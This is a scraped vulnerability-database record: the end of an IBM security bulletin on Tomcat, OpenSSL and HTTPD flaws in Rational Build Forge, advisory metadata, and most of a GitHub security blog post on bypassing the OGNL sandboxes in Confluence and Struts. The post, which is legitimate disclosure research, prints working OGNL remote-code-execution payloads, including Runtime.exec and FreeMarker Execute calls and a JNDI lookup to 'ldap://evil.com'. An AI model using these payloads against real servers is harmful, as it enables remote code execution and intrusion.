[CVE-2018-8014](<https://vulners.com/cve/CVE-2018-8014>) \n**DESCRIPTION:** Apache Tomcat could provide weaker than expected security, caused by insecure default settings for the CORS filter. A remote attacker could exploit this vulnerability to launch further attacks on the system. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/143411> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2018-8034](<https://vulners.com/cve/CVE-2018-8034>) \n**DESCRIPTION:** Apache Tomcat could allow a remote attacker to bypass security restrictions, caused by a missing host name verification when using TLS with the WebSocket client. An attacker could exploit this vulnerability to bypass security constraints to access restricted resources. 
\nCVSS Base Score: 3.7 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/147211> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)\n\n**CVEID:** [CVE-2018-0732](<https://vulners.com/cve/CVE-2018-0732>) \n**DESCRIPTION:** OpenSSL is vulnerable to a denial of service, caused by the sending of a very large prime value to the client by a malicious server during key agreement in a TLS handshake. By spending an unreasonably long period of time generating a key for this prime, a remote attacker could exploit this vulnerability to cause the client to hang. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/144658> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n**CVEID:** [CVE-2018-0737](<https://vulners.com/cve/CVE-2018-0737>) \n**DESCRIPTION:** OpenSSL could allow a local attacker to obtain sensitive information, caused by a cache-timing side channel attack in the RSA Key generation algorithm. An attacker with access to mount cache timing attacks during the RSA key generation process could exploit this vulnerability to recover the private key and obtain sensitive information. \nCVSS Base Score: 3.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/141679> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N) \n\n**CVEID:** [CVE-2018-1333](<https://vulners.com/cve/CVE-2018-1333>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service. By sending specially crafted HTTP/2 requests, a remote attacker could exploit this vulnerability to cause worker exhaustion. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/146701> for more information. 
\nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n**CVEID:** [CVE-2018-8011](<https://vulners.com/cve/CVE-2018-8011>) \n**DESCRIPTION:** Apache HTTP Server is vulnerable to a denial of service, caused by a NULL pointer dereference in the mod_md challenge handler. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to cause the child process to segfault. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: <https://exchange.xforce.ibmcloud.com/vulnerabilities/146700> for more information. \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n\n## Affected Products and Versions\n\nAll the versions of IBM Rational Build Forge from 8.0 through 8.0.0.8.\n\n## Remediation/Fixes\n\nApply the correct fix pack or iFix for your version of the Rational Build Forge:\n\n**Affected Version** | **Fix** \n---|--- \nBuild Forge 8.0 - 8.0.0.8 | Rational Build Forge 8.0.0.9 [Download](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Build+Forge&fixids=RationalBuildForge-8.0.0.9&source=SAR>). 
\n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-21T22:55:01", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Tomcat, Open SSL, and Apache HTTPD affects Rational Build Forge", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-0732", "CVE-2018-0737", "CVE-2018-1333", "CVE-2018-8011", "CVE-2018-8014", "CVE-2018-8034"], "modified": "2018-11-21T22:55:01", "id": "9304092E63FBA16253D493D2E1E4C422EF1498D05C9ADDCBBA838C3C29B1EF87", "href": "https://www.ibm.com/support/pages/node/719629", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-12-01T17:30:01", "description": "The defaults settings for the CORS filter provided in Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31, 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and enable 'supportsCredentials' for all origins. It is expected that users of the CORS filter will have configured it appropriately for their environment rather than using it in the default configuration. 
Therefore, it is expected that most users will not be impacted by this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T16:32:32", "type": "github", "title": "The defaults settings for the CORS filter provided in Apache Tomcat are insecure and enable 'supportsCredentials' for all origins", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2023-01-09T05:03:13", "id": "GHSA-R4X2-3CQ5-HQVP", "href": "https://github.com/advisories/GHSA-r4x2-3cq5-hqvp", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-01T17:29:59", "description": "Apache Struts contains a Remote Code Execution when using results with no namespace and it's upper actions have no or wildcard namespace. 
The same flaw exists when using a url tag with no value, action set, and it's upper actions have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-18T19:24:38", "type": "github", "title": "Apache Struts vulnerable to remote command execution (RCE) due to improper input validation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-04T05:05:10", "id": "GHSA-CR6J-3JP9-RW65", "href": "https://github.com/advisories/GHSA-cr6j-3jp9-rw65", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-01T17:29:59", "description": "Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. 
An unauthorized malicious user can gain unauthorized access to methods that should be restricted.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T20:05:49", "type": "github", "title": "Spring Framework when used in combination with any versions of Spring Security contains an authorization bypass", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1258"], "modified": "2023-01-28T05:00:55", "id": "GHSA-CXRJ-66C5-9FMH", "href": "https://github.com/advisories/GHSA-cxrj-66c5-9fmh", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T17:06:16", "description": "## Overview[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#overview>)\n\nObject Graph Notation Language (OGNL) is a popular, Java-based, expression language used in popular frameworks and applications, such as Apache Struts and Atlassian Confluence. 
In the past, OGNL injections led to some serious remote code execution (RCE) vulnerabilities, such as the [Equifax breach](<https://www.synopsys.com/blogs/software-security/equifax-apache-struts-vulnerability-cve-2017-5638/>), and over the years, protection mechanisms and mitigations against OGNL injections have been developed and improved to limit the impact of these vulnerabilities.\n\nIn this blog post, I will describe how I was able to bypass certain OGNL injection protection mechanisms, including the one used by Struts and the one used by Atlassian Confluence. The purpose of this blog post is to share different approaches used when analyzing this kind of protection so they can be used to harden similar systems.\n\nNo new OGNL injections are being reported as part of this research, and unless future OGNL injections are found on the affected frameworks/applications, or known double evaluations affect an existing Struts application, this research does not constitute any immediate risk for Apache Struts or Atlassian Confluence.\n\n## Hello OGNL, my old friend[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#hello-ognl-my-old-friend>)\n\nI have a past history of bugs found in Struts framework, including [CVE-2016-3087](<https://cwiki.apache.org/confluence/display/WW/S2-033>), [CVE-2016-4436](<https://cwiki.apache.org/confluence/display/WW/S2-035>), [CVE-2017-5638](<https://cwiki.apache.org/confluence/display/WW/S2-046>), [CVE-2018-1327](<https://cwiki.apache.org/confluence/display/WW/S2-056>), [CVE-2020-17530](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and even some [double OGNL injections](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) through both Velocity and FreeMarker tags that remain unfixed to this date. 
Therefore, I have become familiar with the OGNL sandbox and different escapes over the years and I am still interested in any OGNL-related vulnerabilities that may appear. That was the case with Atlassian Confluence, [CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) and [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>), where the former is an instance of the unresolved double evaluation via Velocity tags mentioned in my [2020 advisory](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nMy friend, Man Yue Mo, wrote a [great article](<https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/>) describing how the OGNL mitigations have been evolving over the years and there are few other posts that also describe in detail how these mitigations have been improving.\n\nIn 2020, disabling the sandbox became harder, so I decided to change the approach completely. I introduced new ways to get RCE by circumventing the sandbox, and using the application server\u2019s Instance Manager to instantiate arbitrary objects that I could use to achieve RCE. This research was presented at our Black Hat 2020 talk, [Scribbling outside of template security](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>). We reported this issue to the Apache Struts team, and they [fixed](<https://github.com/apache/struts/commit/8d3393f09a06ff4a2b6827b6544524d1d6af3c7c>) the issue by using a block list. 
However, in 2021, Chris McCown published a [new bypass technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>) which leverages the OGNL\u2019s AST maps and the Apache Commons Collections BeanMap class.\n\nThat was it\u2013at that point I had enough of OGNL and stopped looking into it until two events happened in the same week:\n\n * My friend, [Mert](<https://twitter.com/mertistaken>), found what he thought was an SSTI in a bug bounty program. It turned out to be an OGNL injection, so he asked me to help him with the exploitation of the issue.\n * I read several tweets claiming that [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>) was not vulnerable to RCE on the latest Confluence version (7.18.0 at that time).\n\nOkay, OGNL, my old friend. Here we go again.\n\n## Looking at Confluence `isSafeExpression` protection[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-at-confluence-issafeexpression-protection>)\n\nWhen the CVE-2022-26134 was released there was an initial understanding that the [OGNL injection could not lead to direct RCE in the latest version 7.18.0](<https://twitter.com/httpvoid0x2f/status/1532924239216627712>) since the `isSafeExpression` method was not possible to bypass for that version\n\n\n\nHarsh Jaiswal ([@rootxharsh](<https://twitter.com/rootxharsh>)) and Rahul Maini ([@iamnoooob](<https://twitter.com/iamnoooob>)) took a different approach and looked for a gadget chain in the allowed classes list that could allow them to create an admin account.\n\n\n\nSoon after, [@MCKSysAr](<https://twitter.com/MCKSysAr>) found a [nice and simple bypass](<https://twitter.com/MCKSysAr/status/1533053536430350337>):\n\n 1. Use `Class` property instead of `class` one.\n 2. Use string concatenation to bypass string checks.\n\n \n \n\n\nMCKSysAr\u2019s bypass was soon addressed by blocking the access to the `Class` and `ClassLoader` properties. 
I had some other ideas, so I decided to take a look at the `isSafeExpression` implementation.\n\nThe first interesting thing I learned was that this method was actually parsing the OGNL expression into its AST form in order to analyze what it does and decide whether it should be allowed to be executed or not. Bye-bye to regexp-based bypasses.\n\nThen the main logic to inspect the parsed tree was the following:\n\n * Starting at the root node of the AST tree, recursively call `containsUnsafeExpression()` on each node of the tree.\n * If the node is an instance of `ASTStaticField`, `ASTCtor` or `ASTAssign` then the expression is deemed to be unsafe. This will prevent payloads using the following vectors: \n * Static field accesses\n * Constructors calls\n * Variable assignments\n * If the node is an `ASTStaticMethod` check that the class the method belongs to is in an allow list containing: \n * `net.sf.hibernate.proxy.HibernateProxy`\n * `java.lang.reflect.Proxy`\n * `net.java.ao.EntityProxyAccessor`\n * `net.java.ao.RawEntity`\n * `net.sf.cglib.proxy.Factory`\n * `java.io.ObjectInputValidation`\n * `net.java.ao.Entity`\n * `com.atlassian.confluence.util.GeneralUtil`\n * `java.io.Serializable`\n * If node is an `ASTProperty` checks block list containing (after the initial fix): \n * `class`\n * `Class`\n * `classLoader`\n * `ClassLoader`\n * If the property looks like a class name, check if the class's namespace is defined in the `unsafePackageNames` block list (too long to list here).\n * If node is an `ASTMethod`, check if we are calling `getClass` or `getClassLoader`.\n * If node is an `ASTVarRef`, check if the variable name is in `UNSAFE_VARIABLE_NAMES` block list: \n * `#application`\n * `#parameters`\n * `#request`\n * `#session`\n * `#_memberAccess`\n * `#context`\n * `#attr`\n * If node in an `ASTConst` (eg: a string literal), call `isSafeExpressionInternal` which will check the string against a block list (for example, harmful class names) and, in addition, 
it will parse the string literal as an OGNL expression and apply the `containsUnsafeExpression()` recursive checks on it.\n * If a node has children, repeat the process for the children.\n\nThis is a pretty comprehensive control since it parses the AST recursively and makes sure that any AST nodes considered harmful are either rejected or inspected further.\n\nMCKSysAr bypass was based on two things: A) `Class` and `ClassLoader` properties were not accounted for when inspecting `ASTProperty` nodes; and B) `\u201djava.lang.\u201d + \u201cRuntime\u201d` was parsed as an `ASTAdd` node with two `ASTConst` children. None of them matched any of the known harmful strings and when parsed as an OGNL expression, none of them were valid expressions so they were not parsed further. A) Was fixed quickly by disallowing access to `Class` and `ClassLoader` properties, but B) was not fixed since it was considered as a security in-depth control (it's impossible to analyze all variants in which a malicious string could be written).\n\nWith that in mind I took a look at the[ list of the OGNL AST nodes](<https://github.com/orphan-oss/ognl/tree/master/src/main/java/ognl>) to see if there was anything interesting that was not accounted for in the `isSafeExpression()` method.\n\n### Enter `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-asteval>)\n\nThe first one that got my attention was `ASTEval`. It looked very interesting and it was not accounted for by the `containsUnsafeExpression()` method.\n\n`ASTEval` are nodes in the form of `(expr)(root)` and they will parse the `expr` string into a new AST and evaluate it with `root` as its root node. This will allow us to provide an OGNL expression in the form of a string `(ASTConst)` and evaluate it! We know that `ASTConst` nodes are parsed as OGNL expressions and verified to not be harmful. 
However, we already saw that if we split the string literal in multiple parts, only the individual parts will be checked and not the result of the concatenation. For example, for the payload below `#application` will never get checked, only `#` and `application` which are deemed to be safe:\n\n \n \n\n\nAs you can see in the resulting tree, there are no hints of any `ASTVarRef` node and therefore access to `#application` is granted.\n\n### Weaponizing `ASTEval`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#weaponizing-asteval>)\n\nThere are multiple ways to craft a payload levering this vector. For example, we could get arbitrary RCE with echoed response:\n \n \n ('(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@get'+'Runtime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))')('')\n \n \n\n\n\n### Enter `ASTMap`, `ASTChain` and `ASTSequence`[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#enter-astmap-astchain-and-astsequence>)\n\nI was already familiar with `ASTMap`s from reading [Mc0wn's great article](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). In a nutshell, OGNL allows developers to instantiate any `java.util.Map` implementation by using the `@<class_name>@{}` syntax.\n\nUsing this technique, we were able to use a `BeanMap` (a map wrapping a Java bean and exposing its getters and setters as map entries) to bypass the `getClass` limitation by rewriting the payload as:\n \n \n \n BeanMap map = @org.apache.commons.beanutils.BeanMap@{};\n \n map.setBean(\u201c\u201d)\n \n map.get(\u201cclass\u201d).forName(\u201djavax.script.ScriptEngineManager\u201d).newInstance().getEngineByName(\u201cjs\u201d).eval(payload)\n \n \n\nThis payload avoids calling the `BeanMap` constructor explicitly and, therefore, gets rid of the `ASTCtor` limitation. 
In addition, it allows us to call `Object.getClass()` implicitly by accessing the `class` item. However, we still have another problem: we need to be able to assign the map to a variable (`map`) so we can call the `setBean()` method on it and later call the `get()` method on the same map. Since `ASTAssign` was blocked, assignments were not an option. Fortunately, looking through the list of AST nodes, two more nodes got my attention: `ASTChain` and `ASTSequence`.\n\n * `ASTChain` allows us to pass the result of one evaluation as the root node of the next evaluation. For example: `(one).(two)` will evaluate `one` and use its result as the root for the evaluation of `two`.\n * `ASTSequence` allows us to run several evaluations on the same root object in sequence. For example: `one, two` will evaluate `one` and then `two` using the same root node.\n\nThe idea was to bypass `ASTAssign` constraint by combining `ASTChain` and `ASTSequence` together\n\nWe can set the map returned by the `ASTMap` expression as the root for a sequence of expressions so all of them will have the map as its root object:\n \n \n \n (#@BeanMap@{}).(expression1, expression2)\n \n \n\nIn our case, `expression1` is the call to `setBean()` and `expression2` is the call to `get()`.\n\nTaking that into account and splitting literal strings into multiple parts to bypass the block list we got the following payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@{}).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nThe final AST tree bypassing all `isSafeExpression` checks is:\n\n \n \n\n\nThere was a final problem to solve. The OGNL injection sink was `translateVariable()` which resolves OGNL expressions wrapped in `${expressions}` delimiters. Therefore, our payload was not allowed to contain any curly brackets. 
Fortunately, for us, [OGNL will replace unicode escapes](<https://github.com/apache/commons-ognl/blob/master/src/main/jjtree/ognl.jjt#L36-L37>) for us so we were able to use the final payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@\\\\u007b\\\\u007d).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nI submitted these bypasses to Atlassian through its bug bounty program and, even though I was not reporting any new OGNL injections but a bypass of its sandbox, they were kind enough to award me with a $3,600 bounty!\n\n## Looking into Struts2[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#looking-into-struts2>)\n\nAs mentioned before, a friend found what he thought was a Server-Side Template Injection (SSTI) (`%{7*7}` => 49) but it turned out to be an OGNL injection. Since this happened as part of a bug bounty program, I didn\u2019t have access to the source code. I can't be sure if the developers were passing untrusted data to an OGNL sink (for example, `[ActionSupport.getText()](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionSupport.html#getText-java.lang.String->)`), or if it was some of the [unfixed double evaluations issues](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) (still working at the time of writing). Anyhow, the application seemed to be using the latest Struts version and known payloads were not working. I decided to take a deeper look.\n\n### New gadgets on the block[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#new-gadgets-on-the-block>)\n\nWhen I listed what objects were available I was surprised to find that many of the usual objects in the Struts OGNL context, such as the value stack, were not there, and some others I haven't seen before were available. 
One of such objects was `#request[\u2018.freemarker.TemplateModel\u2019]`. This object turned out to be an instance of `org.apache.struts2.views.freemarker.ScopesHashModel` containing a variety of new objects. One of them (stored under the `ognl` key) gave me access to an `org.apache.struts2.views.jsp.ui.OgnlTool` instance. Looking at the code for this class I quickly spotted that it was calling `Ognl.getValue()`. This class is not part of Struts, but the OGNL library and, therefore, the Struts sandbox (member access policy) was not enabled! In order to exploit it I used the following payload:\n \n \n \n #request[\u2018.freemarker.TemplateModel\u2019].get(\u2018ognl\u2019).getWrappedObject().findValue(\u2018(new freemarker.template.utility.Execute()).exec({\u201cwhoami\u201d})\u2019, {})\n \n \n\nThat was enough to get the issue accepted as a remote code execution in the bounty program. However, despite having achieved RCE, there were a few unsolved questions:\n\n * Why was this `.freemarker.TemplateModel` object available?\n * Are there any other ways to get RCE on the latest Struts versions?\n\n### Post-invocations Context[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#post-invocations-context>)\n\nAttackers are limited to the objects they are able to access. 
Normally, OGNL injections take place before the action invocation completes and the action\u2019s `Result` is rendered.\n\nhttps://struts.apache.org/core-developers/attachments/Struts2-Architecture.png\n\nWhen grepping the Struts\u2019s source code for `.freemarker.TemplateModel`, I found out that there are plenty of new objects added to the request scope when preparing the action\u2019s `Result` in order to share them with the view layer (JSP, FreeMarker or Velocity) and `.freemarker.TemplateModel` was [one of them](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerManager.java#L122>). However, those objects are only added after the `ActionInvocation` has been invoked. This implies that if I find `.freemarker.TemplateModel` on the request scope, my injection was evaluated after the action invocation finished building the action\u2019s `Result` object and, therefore, my injection probably did not take place as part of the Struts code but as a [double evaluation in the FreeMarker template](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nThese new objects will offer new ways to get remote code execution, but only if you are lucky to get your injection evaluated after the action\u2019s `Result` has been built. Or not? \n\nIt turned out that the ongoing `ActionInvocation` object can be accessed through the OGNL context and, therefore, we can use it to force the building of the `Result` object in advance. Calling the `Result`s `doExecute()` method will trigger the population of the so-called template model. For example, for Freemarker, `ActionInvocation.createResult()` will create a `FreemarkerResult` instance. 
Calling its `doExecute()` method will, in turn, call its `[createModel()](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerResult.java#L273>)` method that will populate the template model.\n \n \n \n (#ai=#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'])+\n \n (#ai.setResultCode(\"success\"))+\n \n (#r=#ai.createResult())+\n \n (#r.doExecute(\"pages/test.ftl\",#ai))\n \n \n\nExecuting the above payload will populate the request context with new objects. However, that requires us to know the result code and the template\u2019s path. Fortunately, we can also invoke the `ActionInvocation.invoke()` method that will take care of everything for us!\n \n \n \n #attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke()\n \n \n\nThe line above will result in the template model being populated and stored in the request, and context scopes regardless of where your injection takes place.\n\n### Wild objects appeared[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#wild-objects-appeared>)\n\nAfter the invocation, the request scope and value stack will be populated with additional objects. These objects vary depending on the view layer used. 
What follows is a list of the most interesting ones (skipping most of them which do not lead to RCE):\n\nFor Freemarker:\n\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.TemplateModel` (`org.apache.struts2.views.freemarker.ScopesHashModel`) \n * `__FreeMarkerServlet.Application__` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`)\n * `.freemarker.RequestParameters` (`freemarker.ext.servlet.HttpRequestParametersHashModel`)\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.Application` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `.freemarker.JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`) \n * `stack` (`com.opensymphony.xwork2.ognl.OgnlValueStack`) \n * `struts` (`org.apache.struts2.util.StrutsUtil`) \n\nFor JSPs:\n\n * `com.opensymphony.xwork2.dispatcher.PageContext` (`PageContextImpl`)\n\nFor Velocity:\n\n * `.KEY_velocity.struts2.context` -> (`StrutsVelocityContext`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`)\n * `struts` (`org.apache.struts2.views.velocity.result.VelocityStrutsUtils`)\n\n### Getting RCE with new objects[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#getting-rce-with-new-objects>)\n\nAnd now let\u2019s have some fun with these new objects! In the following section I will explain how I was able to leverage some of these objects to get remote code execution.\n\n#### ObjectWrapper[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#objectwrapper>)\n\nThere may be different ways to get an instance of a FreeMarker\u2019s `ObjectWrapper`, even if the application is not using FreeMarker as its view layer because Struts uses it internally for rendering JSP tags. A few of them are listed below:\n\n * Through `freemarker.ext.jsp.TaglibFactory.getObjectWrapper()`. 
Even though Struts\u2019 sandbox forbids access to `freemarker.ext.jsp` package, we can still access it using a BeanMap:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application[\".freemarker.JspTaglibs\"]))+\n \n (#a['objectWrapper'])\n \n \n\n * Through `freemarker.ext.servlet.HttpRequestHashModel.getObjectWrapper()`:\n \n \n \n (#request.get('.freemarker.Request').objectWrapper)\n \n \n\n * Through `freemarker.core.Configurable.getObjectWrapper()`. We need to use the BeanMap trick to access it since `freemarker.core` is also blocklisted:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application['freemarker.Configuration']))+\n \n #a['objectWrapper']\n \n \n\nNow for the fun part, what can we do with an `ObjectWrapper`? There are three interesting methods we can leverage to get RCE:\n\n**`newInstance(class, args)`**\n\nThis method will allow us to instantiate an arbitrary type. Arguments must be wrapped, but the return value is not. For example, we can trigger a JNDI injection lookup:\n \n \n \n objectWrapper.newInstance(@javax.naming.InitialContext@class,null).lookup(\"ldap://evil.com\")\n \n \n\nOr, if Spring libs are available, we can get RCE by supplying a malicious [XML config](<https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml>) for `FileSystemXmlApplicationContext` constructor:\n \n \n \n objectWrapper.newInstance(@org.springframework.context.support.FileSystemXmlApplicationContext@class,{#request.get('.freemarker.Request').objectWrapper.wrap(\"URL\")})\n \n \n\n`**getStaticModels()`**\n\nThis method allows us to get static fields from arbitrary types. The return object is wrapped in a FreeMarker\u2019s `TemplateModel` so we need to unwrap it. 
